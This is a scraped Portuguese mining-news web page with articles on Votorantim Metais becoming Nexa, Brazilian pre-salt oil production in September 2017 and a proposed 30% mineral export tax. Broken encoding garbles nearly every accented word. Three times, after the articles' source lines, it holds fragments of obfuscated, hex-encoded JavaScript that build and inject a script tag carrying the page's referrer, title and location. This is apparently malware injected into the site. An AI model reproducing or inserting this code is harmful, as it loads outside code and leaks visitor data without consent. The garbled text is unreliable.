PorAGEGO Goiás

China amplia importaAi??Ai??es de petrA?leo e cobre em outubro

PorAGEGO Goiás

Pablito provoca demissA?o em massa no DNPM

PorAGEGO Goiás

Votorantim Metais agora Ai?? Nexa, uma empresa global de mineraAi??A?o

Votorantim Metais agora Ai?? Nexa, uma empresa global de mineraAi??A?o

Por Marcelo Villela, novembro 6th, 2017, 12:13 -Ai??LINK PERMANENTE

Ai?? voltar para casa

LanAi??amento da nova marca ocorreu com a abertura de capital da empresa realizada hoje (27/10) nas bolsas de Nova Iorque (NYSE) e de Toronto (TSX)

Da uniA?o da Votorantim Metais, empresa lAi??der de mineraAi??A?o de zinco no Brasil, e a Milpo, lAi??der no Peru, surge aAi??Nexa Resources. A nova marca simboliza o momento de expansA?o e de integraAi??A?o das empresas, preservando consigo o legado de cada uma. O lanAi??amento da marca ocorreu com a abertura de capital nas bolsas de Nova Iorque, nos Estados Unidos, e de Toronto, no CanadA?.

ai???A Nexa nasce como lAi??der de zinco na AmAi??rica Latina e pronta para ser um dos grandes competidores no mercado global. NA?o perderemos, porAi??m, o nosso DNA Votorantim, com os valores e crenAi??as que nos trouxeram atAi?? aqui. Seguiremos sendo uma empresa Votorantim SA e valorizamos essa histA?riaai???, afirma o CEO Tito Martins.

A abertura de capital nas bolsas de Nova Iorque e Toronto contribui para a capitalizaAi??A?o da Nexa, viabilizando novos investimentos. ai???Grande parte do valor captado serA? aportado nos nossos projetos de extraAi??A?o mineral, tanto no estA?gio greenfield quanto brownfield. Isso trarA? crescimento para a empresa, geraAi??A?o de empregos e desenvolvimento localai???, comenta o CEO.

A mudanAi??a de marca nA?o tem qualquer efeito direto nas operaAi??Ai??es da companhia. No Brasil, a Nexa tem cinco unidades, todas localizadas em Minas Gerais. SA?o duas de mineraAi??A?o, em Vazante e Paracatu, duas de metalurgia, em TrA?s Marias e Juiz de Fora, e uma de produAi??A?o de A?cido sulfA?rico, em Fortaleza de Minas. No Peru, a empresa possui uma metalurgia, em Cajamarquilla, e trA?s mineraAi??Ai??es: El Porvenir e Atacocha, na regiA?o de Pasco, e Cerro Lindo, em Ica.

ai???NA?o haverA? alteraAi??A?o no relacionamento com as comunidades e pA?blicos de relacionamento. A marca Nexa nasce com o compromisso de buscar um crescimento sustentA?vel e manter Ai??ntegros todos os atributos das marcas Votorantim Metais e Milpo, como a responsabilidade socioambiental e o desenvolvimento das localidades em que estamos presentes, estimulando o fortalecimento de outras cadeias produtivasai???, esclarece Martins.

Por que Nexa?

Nexa Ai?? a combinaAi??A?o em inglA?s deAi??Next Future,Ai??Excellence,Ai??Extraction eAi??Nexus. O nome remete a uma mineradora que pensa e cria o amanhA? e contribui para uma sociedade mais desenvolvida, realizando a extraAi??A?o dos minAi??rios de forma responsA?vel e eficiente. A referA?ncia ao termoAi??nexoAi??ajuda a simbolizar o sentido e o valor do que a empresa faz.

ai???Nosso posicionamento Ai?? ser uma mineradora global, que usa da sua inteligA?ncia e expertise para desenvolver uma mineraAi??A?o cada dia melhorai???, explica Arlene Domingues, diretora de Recursos Humanos e Corporate Affairs.

Ai??

Sobre a Nexa

Somos Nexa.

Uma mineradora global que faz parte do Grupo Votorantim e do dia a dia da sociedade.

Do cobre dos carros ao cobre dos celulares.

Do zinco das plantaAi??Ai??es ao zinco dos aviAi??es.

Desde 1956 atuamos no mercado de metais nA?o ferrosos. Hoje, crescemos e somos uma das principais mineradoras do mundo todo. Temos aAi??Ai??es negociadas nas bolsas de Nova Iorque e Toronto sob o sAi??mbolo que Ai?? exatamente o nosso nome: (NEXA).

Acreditamos que, quando extraAi??mos o melhor do presente, criamos um futuro melhor para todos nA?s.

Fonte:Ai??veja3m \x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

ProduAi??A?o no prAi??-sal sobe 6,6% em setembro

ProduAi??A?o no prAi??-sal sobe 6,6% em setembro

PrAi??-sal correspondeu a 49,8% do total produzido no Brasil

A produAi??A?o do prAi??-sal em setembro totalizou aproximadamente 1,677 milhA?o de barris de A?leo equivalente por dia, um aumento de 6,6% em relaAi??A?o ao mA?s anterior. A produAi??A?o, oriunda de 82 poAi??os, foi de 1,351 milhA?o de barris de petrA?leo por dia e 52 milhAi??es de metros cA?bicos de gA?s natural por dia e correspondeu a 49,8% do total produzido no Brasil.

Os poAi??os do prAi??-sal sA?o aqueles cuja produAi??A?o Ai?? realizada no horizonte geolA?gico denominado prAi??-sal, em campos localizados na A?rea definida no inciso IV do caput do artigo 2A? da Lei nA? 12.351/2010.

ProduAi??A?o total

A produAi??A?o de petrA?leo no Brasil em setembro totalizou 2,653 milhAi??es de barris por dia (bbl/d), uma aumento de 3% na comparaAi??A?o com o mA?s anterior e uma reduAi??A?o de 0,7% em relaAi??A?o ao mesmo mA?s em 2016.

JA? a produAi??A?o de gA?s natural totalizou 114 milhAi??es de metros cA?bicos por dia (m3/d), um aumento de 1,9% em relaAi??A?o ao mA?s anterior e de 3,2% em relaAi??A?o a setembro de 2016.

A produAi??A?o total de petrA?leo e gA?s natural no PaAi??s foi de aproximadamente 3,370 milhAi??es de barris de A?leo equivalente por dia (boe/d). O boletim completo estA? disponAi??vel em:Ai??http://www.anp.gov.br/wwwanp/publicacoes/boletins-anp/2395-boletim-mensal-da-producao-de-petroleo-e-gas-natural.

Queima de gA?s

O aproveitamento de gA?s natural no Brasil no mA?s de setembro alcanAi??ou 97% do volume total produzido. A queima de gA?s totalizou 3,4 milhAi??es de metros cA?bicos por dia, uma reduAi??A?o de 0,4% se comparada ao mA?s anterior e de 5,7% em relaAi??A?o ao mesmo mA?s em 2016.

Campos produtores

O campo de Lula, na Bacia de Santos, foi o maior produtor de petrA?leo e gA?s natural. Produziu, em mAi??dia, 799 mil bbl/d de petrA?leo e 33,2 milhAi??es de m3/d de gA?s natural.

Os campos marAi??timos produziram 95,3% do petrA?leo e 79,3% do gA?s natural. A produAi??A?o ocorreu em 8.115 poAi??os, sendo 725 marAi??timos e 7.390 terrestres. Os campos operados pela Petrobras produziram 93,8% do petrA?leo e gA?s natural. Estreito, na Bacia Potiguar, teve o maior nA?mero de poAi??os produtores: 1.091. Marlim Sul, na Bacia de Campos, foi o campo marAi??timo com maior nA?mero de poAi??os produtores: 92.

A FPSO Cidade de ItaguaAi??, produzindo no campo de Lula, por meio de 6 poAi??os a ela interligados, produziu 188,4 mil boe/d e foi a UEP (Unidade EstacionA?ria de ProduAi??A?o) com maior produAi??A?o.

Outras informaAi??Ai??es

Em setembro de 2017, 306 concessAi??es, operadas por 25 empresas, foram responsA?veis pela produAi??A?o nacional. Destas, 79 sA?o concessAi??es marAi??timas e 227 terrestres. Vale ressaltar que, do total das concessAi??es produtoras, duas encontram-se em atividade exploratA?ria e produzindo atravAi??s de Teste de Longa DuraAi??A?o (TLD), e outras sete sA?o relativas a contratos de A?reas contendo acumulaAi??Ai??es marginais.

O grau API mAi??dio foi de 26,9, sendo 35,2% da produAi??A?o considerada A?leo leve (>=31Ai??API), 49,6% A?leo mAi??dio (>=22 API e <31 API) e 15,2% A?leo pesado (<22 API).

As bacias maduras terrestres (campos/testes de longa duraAi??A?o das bacias do EspAi??rito Santo, Potiguar, RecA?ncavo, Sergipe e Alagoas) produziram 129,3 mil boe/d, sendo 103,9 mil bbl/d de petrA?leo e 4 milhAi??es de m3/d de gA?s natural. Desse total, 124,3 mil barris de A?leo equivalente por dia foram produzidos pela Petrobras e 5 mil boe/d por concessAi??es nA?o operadas pela Petrobras, sendo 349 boe/d em Alagoas, 2.318 boe/d na Bahia, 60 boe/d no EspAi??rito Santo, 2.104 boe/d no Rio Grande do Norte e 199 boe/d em Sergipe.

Fonte: ANP x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

Drones de mineradoras sA?o destruAi??dos por A?guias na AustrA?lia

PorAGEGO Goiás

Falha operacional paralisa refinaria da Petrobras

PorAGEGO Goiás

Taxar exportaAi??Ai??es de minAi??rios, a discussA?o continua…

PorAGEGO Goiás

RelatA?rio propAi??e alAi??quota de 30% de Imposto de ExportaAi??A?o de minAi??rios

RelatA?rio propAi??e alAi??quota de 30% de Imposto de ExportaAi??A?o de minAi??rios


As exportaAi??Ai??es de minAi??rio brasileiras poderA?o ser taxadas em 30% para compensar as perdas dos Estados com a desoneraAi??A?o de ICMS sobre vendas ao exterior. A proposta foi incluAi??da no relatA?rio do projeto que regulamenta os repasses da chamada Lei Kandir, apresentado nesta terAi??a-feira, 31, pelo senador Wellington Fagundes (PR-MT) na comissA?o mista criada para discutir o tema. Foi dada vista coletiva aos integrantes da comissA?o e a previsA?o Ai?? que o relatA?rio seja votado somente a partir da prA?xima semana.A Lei Kandir, de 1996, isentou do pagamento de ICMS produtos e serviAi??os ligados Ai?? exportaAi??A?o e previu que os Estados seriam recompensados. Os valores repassados, porAi??m, nunca foram regulamentados e sA?o alvo de disputa entre Estados e UniA?o. No fim do ano passado, o Supremo Tribunal Federal (STF) deu prazo de um ano para que o Congresso Nacional regulamentasse os pagamentos e o Legislativo corre agora para tentar aprovar um projeto atAi?? o inAi??cio de dezembro.

A proposta do senador Fagundes estabelece o repasse anual de R$ 9 bilhAi??es aos Estados exportadores, corrigidos anualmente pela inflaAi??A?o medida pelo IPCA. O valor estaria acima do que vem sendo repassado pela Lei Kandir e pelo fundo de apoio Ai?? exportaAi??A?o (FEX), previsto na lei.

Neste ano, os dois valores tA?m orAi??amento de R$ 3,8 bilhAi??es, mas o pagamento do FEX Ai?? discricionA?rio e Ai?? muitas vezes contingenciado pelo governo, que chegou a nA?o repassar valor algum do fundo em anos anteriores. “Hoje temos total instabilidade, o governo paga se quiser e quando quiser”, afirmou Fagundes ao Broadcast, serviAi??o de notAi??cias em tempo real do Grupo Estado.

Como o projeto dificilmente serA? aprovado antes da votaAi??A?o do OrAi??amento de 2018, o senador apresentou uma emenda prevendo R$ 5 bilhAi??es para o FEX no prA?ximo ano, que seriam somados a R$ 1,9 bilhA?o, da Lei Kandir. A emenda ainda nA?o foi apreciada pela ComissA?o Mista de OrAi??amento (CMO).

Com o OrAi??amento da UniA?o prA?ximo ao teto dos gastos, o senador teve que incluir uma previsA?o de receita para o pagamento dos recursos, que deverA? vir principalmente do aumento da alAi??quota do Imposto de ExportaAi??A?o sobre minAi??rios. A previsA?o Ai?? arrecadar R$ 6,5 bilhAi??es com a taxaAi??A?o, que deverA? causar polA?mica no setor, que tem tido bom desempenho nas vendas ao exterior.

Passivo

O relatA?rio do senador Fagundes nA?o prevA? uma soluAi??A?o para o alegado passivo dos Estados em relaAi??A?o a esses repasses. Os Estados afirmam que o governo sA? pagou 17,8% do devido entre 1992 e 2016, e que haveria um passivo de R$ 548,78 bilhAi??es relativos ao perAi??odo. O governo diz que o pagamento desses montantes nA?o Ai?? obrigatA?rio, jA? que nA?o hA? regulamentaAi??A?o do FEX atAi?? o momento.

De acordo com o senador, isso nA?o serA? discutido neste momento para nA?o inviabilizar a votaAi??A?o do projeto. “Isso pode ser incluAi??do em outros processos, mas temos que aprovar a regulamentaAi??A?o agora para evitar que o cA?lculo fique para o Tribunal de Contas da UniA?o (TCU), como prevA? a decisA?o do STF”, disse.

O relatA?rio prevA? que os R$ 9 bilhAi??es serA?o distribuAi??dos da seguinte forma: 75% para os Estados e 25% para os municAi??pios. O rateio serA? feito de forma a assegurar que nenhum ente receba, nos prA?ximos exercAi??cios, menos do que o que recebeu em 2016.

Fonte: SOCOPA/Estado

\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

PorAGEGO Goiás

PrAi??-sal pode render R$ 600 bi Ai?? UniA?o atAi?? 2054

PorAGEGO Goiás

MineraAi??A?o nA?o Ai?? medida provisA?ria